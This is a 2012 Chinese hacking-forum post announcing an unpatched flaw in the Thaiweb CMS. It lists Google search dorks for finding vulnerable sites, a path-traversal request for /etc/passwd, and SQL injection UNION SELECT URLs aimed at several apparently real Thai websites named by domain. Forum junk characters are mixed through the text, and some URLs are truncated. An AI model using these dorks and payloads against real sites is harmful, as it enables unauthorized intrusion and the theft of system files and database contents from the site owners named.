找回密码
 立即注册
查看: 2877|回复: 0
打印 上一主题 下一主题

Thaiweb远程文件sql注入漏洞0day

[复制链接]
跳转到指定楼层
楼主
发表于 2012-12-27 08:38:39 | 只看该作者 回帖奖励 |正序浏览 |阅读模式
Google之:2 p  m" \( x/ r

3 n3 A) T# V$ I; ?- Y$ u7 E8 Uintext:powered by Thaiweb  [1 u3 w4 v5 g$ }

  T) h9 ~5 d) i8 I! h1 L$ \inurl:index.php?page=board.php3 W( e$ O, m1 s- l6 \) o
% p% {. P' M7 Z; L5 s

) T- q$ \1 F: P: E' \3 |
  |4 A2 G1 r: R. z利用点1:http://www.xfack.com/index.php?p ... ../../../etc/passwd
& w$ U% h- R9 ^3 D; a3 S; g3 }% d. y1 ~9 H0 d' k& m  W
" f+ v: F/ Y) r2 ~

% x4 f7 L9 s1 G利用点2:http://www.xfack.com/index.php?page=boardque.php&bod_id=4'
, u0 C: u8 B, Y/ `3 o6 k( ~, Y, G  o& i; y; a# ^

& L& Z' x5 Z* ]
7 H  k& y- w8 u0 O5 V% Khttp://www.keytasin.com//index.p ... d=-4+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,316--
* {3 f" D" i  S* Q+ k9 v1 ~& w. j
# ~4 e6 O8 s& A1 F! Q+ [1 Whttp://www.autopartnerthailand.c ... d=-4+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,316--+ D0 A% G% f$ p- r( n0 U

9 K2 W6 J- [" e6 fhttp://gift.in.th/index.php?page ... d=-4+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,316--9 c0 L) [7 ^2 S& ^6 s, L
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表